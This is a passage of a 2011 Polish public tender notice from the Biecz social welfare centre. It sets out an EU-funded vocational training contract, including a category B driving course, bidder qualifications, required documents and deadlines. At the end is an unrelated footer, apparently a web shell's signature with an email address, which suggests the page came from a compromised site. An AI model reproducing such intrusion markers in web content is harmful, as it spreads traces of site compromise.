Kurs praktyczny(60 godzin)-z zakresu kursu prawa jazdy kat B
a)zakres z nauki jazdy odbywać się będą na podstawie indywidualnego planu kursanta

Wykonawca zapewni:
a) warunki lokalowe, plac manewrowy (120 m2  wyposażony w pachołki i tyczki ) i wyposażenie dydaktyczne zgodne  z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005 r. Nr 217 poz. 1834 z późn. zm.).
b) sprzęt komputerowy wraz z odpowiednim oprogramowaniem i dodatkowym wyposażeniem umożliwiającym sprawdzenie nabytej przez uczestników wiedzy teoretycznej. Ponadto, Wykonawca zapewni każdemu uczestnikowi kursu bezzwrotny egzemplarz podręcznika dla kandydatów na kurs prawo jazdy kat. B wraz z płytą DVD/CD zawierającą aktualnie obowiązujące zestawy pytań testowych wykorzystywane podczas egzaminu państwowego
c) Realizując praktyczną naukę jazdy, marki samochodów należy dostosować do wymagań Małopolskiego Ośrodka Ruchu Drogowego w Nowym Sączu lub Wojewódzkiego Ośrodka  Ruchu Drogowego w Krośnie.
d) zajęcia będące przedmiotem zamówienia muszą być przeprowadzone przez doświadczoną i wykwalifikowaną kadrę spełniającą wymogi nałożone przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z                    2005 r. Nr 217 poz. 1834 z późn. zm.).
e) w koszt kursu nie wchodzi opłata za pierwszy i ewentualnie kolejne  egzaminy.
Zamawiający wymaga aby Wykonawca zapewnił uczestnikom szkolenia zawodowego badania lekarskie wraz              z zaświadczeniem koniecznym do uczestnictwa w kursie prawa jazdy.

10) Informacje dodatkowe, które należy uwzględnić w cenie oferty:
Zajęcia szkoleniowe odbywać się będą od poniedziałku do piątku w dniach pracy Zamawiającego.
Dla każdego opisanego wyżej modułu tematycznego (od 1 do 9)   Wykonawca zapewni uczestnikom szkolenia w szczególności: salę dydaktyczną przystosowaną do ilości uczestników szkolenia (wykłady), odpowiednich miejsc do zajęć praktycznych, odpowiedni sprzęt dydaktyczny i praktyczny z osobnymi miejscami dla każdego uczestnika szkolenia, niezbędnych do prawidłowego przeprowadzenia szkoleń, a także poczęstunek dla uczestników szkolenia: kawa, herbata, zimne napoje, przekąski itp. w każdym dniu szkolenia, a w przypadku trwania zajęć powyżej 4 godzin - gorący posiłek (obiad 2 daniowy). Produkty podawane podczas serwisu kawowego i wykorzystywane do przygotowania gorącego posiłku winny spełniać normy żywieniowe oraz sanitarno-epidemiologiczne. 
Ponadto każdy uczestnik szkolenia musi zostać wyposażony w bezzwrotne materiały piśmienne /notes, długopis, dziennik zajęć/ i materiały dydaktyczne, które należy oznaczyć logo Programu Operacyjnego Kapitał Ludzki, emblematem Unii Europejskiej z podpisem Europejski Fundusz Społeczny. Zamawiający zaleca aby wykonawca prowadził nadzór wewnętrzny nad szkoleniami tj. prowadził  imienne listy obecności, dziennik zajęć edukacyjnych, protokoły z egzaminów, rejestr wydawanych zaświadczeń, przeprowadza ankietę na dzień rozpoczęcia szkolenia i na jego zakończenie oraz dostarczenia ich Zamawiającemu itp.  Należy zapewnić wszystkim uczestnikom szkoleń ubezpieczenie NW, szkolenie bhp, odzież ochronną.  Zaleca się,  aby całość projektu realizowana była na terenie Gminy Biecz lub Powiatu Gorlickiego. Zamawiający dopuszcza jednak możliwość organizacji  i przeprowadzenia szkoleń poza tym obszarem. Wykonawca zabezpieczy we własnym zakresie dojazd uczestników szkolenia do miejsca w którym odbywać się będą szkolenia, a także zapewni powrót wszystkim uczestnikom do Biecza.

5. Szkolenia winne zakończyć się egzaminem praktycznym i teoretycznym, sprawdzającym stopień opanowania wiedzy                        i umiejętności, a po egzaminie wydaniem właściwych (zgodnie z obowiązującymi w tym zakresie przepisami) świadectw, zaświadczeń kwalifikacyjnych, certyfikatów. 

Uwaga !
Zamawiający wymaga, aby Wykonawca zapewnił wszystkim uczestnikom szkoleń ubezpieczenie od następstw nieszczęśliwych wypadków (NNW) w czasie trwania szkoleń i w drodze na nie i z powrotem.
Badania i ubezpieczenie należy również uwzględnić w kalkulacji ceny ofertowej !  
NNW - kopia polisy
Badania lekarskie -  zaświadczenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna posiadanie przez Wykonawcę aktualnego (na dany rok kalendarzowy) wpisu do Rejestru Instytucji Szkoleniowych prowadzonych przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, zgodnie z art. 22 ust. 1 ustawy z dnia 20 kwietnia 2008r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jedn. Dz.U. z 2008r. Nr 69  poz. 415 z późn. zm.) - ocena tego warunku nastąpi na podstawie złożonego w tym zakresie oświadczenia - załącznik Nr 7 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna wykonanie z należytą starannością w okresie trzech ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przed dniem składania ofert, co najmniej trzech zamówień, odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia, przez co Zamawiający rozumie realizację warsztatów i/lub kursów i/lub szkoleń z zakresu przygotowania zawodowego  o tematyce zgodnej z rodzajem kursów/szkoleń/warsztatów wyszczególnionych w niniejszym zamówieniu (należy wykazać trzy różne tematycznie zamówienia w oparciu o te, które określono  w Dziale 2 SIWZ), z podaniem ich wartości, nazwy zleceniodawcy, terminu realizacji (według wzoru stanowiącego załącznik nr 5 do SIWZ, a także załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie (opinie, referencje wystawione przez poprzednio zamawiających).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna pisemne oświadczenie wykonawcy w tym zakresie (załącznik nr 3 do  SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	za spełnienie powyższego warunku, zamawiający uzna wykazanie przez Wykonawcę osób (kadra zawodowa - według wzoru stanowiącego załącznik nr 6 do SIWZ) mających uczestniczyć w realizacji przedmiotu zamówienia, które to osoby muszą posiadać kwalifikacje zawodowe niezbędne do realizacji zamówienia tj: 	

Trener - psycholog lub osoba posiadająca uprawnienia do prowadzenia szkoleń z zakresu umiejętności psychospołecznych, minimum 2-letnie doświadczenie w pracy terapeutycznej

Trener - osoba posiadająca uprawnienia pedagogiczne do prowadzenia zajęć z informatyki (obsługa komputera), minimum 2-letnie doświadczenie,

Trener - osoba posiadająca uprawnienia pedagogiczne oraz ukończony kurs instruktorski z zakresu obsługi kas fiskalnych, minimum 2-letnie doświadczenie,

Instruktor nauki jazdy, minimum 2-letnie doświadczenie, posiadający kwalifikacje zawodowe określone przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania                            i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów, 

Trener- osoba uprawniona do przeprowadzenia kursu (szkolenia) w zawodzie przedstawiciela handlowego, minimum 2- letnie doświadczenie oraz posiadające uprawnienia pedagogiczne

Trener- osoba uprawniona do przeprowadzenia kursu (szkolenia) w zawodzie kosmetyczki /kosmetyka, minimum               2- letnie doświadczenie oraz posiadająca uprawnienia pedagogiczne</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie powyższego warunku zamawiający uzna pisemne oświadczenie wykonawcy w tym zakresie art. 22 ust. 1 ustawy (załącznik nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oferta na formularzu ofertowym o treści zgodnej z określoną we wzorze stanowiącym zał. nr 1 do SIWZ
2)  Potwierdzony przez upoważnionego przedstawiciela Wykonawcy wzór umowy stanowiący zał. nr 2 do SIWZ
3)  Dokument (np. pełnomocnictwo, umowa spółki cywilnej, zaświadczenie o wpisie do ewidencji działalności  
    gospodarczej, itp.) potwierdzający, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania 
    Wykonawcy, jeżeli nie wynika to z innych dokumentów załączonych do oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Certyfikat jakości Usług ISO - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków tych zmian zawiera wzór umowy stanowiący zał. nr 2</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.biecz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKO-GMINNY OŚRODEK POMOCY SPOŁECZNEJ
ul. Tysiąclecia 5, 38-340 Biecz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2011 godzina 09:30, miejsce: MIEJSKO-GMINNY OŚRODEK POMOCY SPOŁECZNEJ
ul. Tysiąclecia 5, 38-340 Biecz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Czas na aktywność w gminie Biecz realizowany przez Miejsko-Gminny Ośrodek Pomocy Społecznej w Bieczu 
na podstawie umowy zawartej z Wojewódzkim Urzędem
Pracy w Krakowie o dofinansowanie wyżej wskazanego projektu w ramach
Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki,
współfinansowanego przez Unię Europejską ze środków Europejskiego
Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com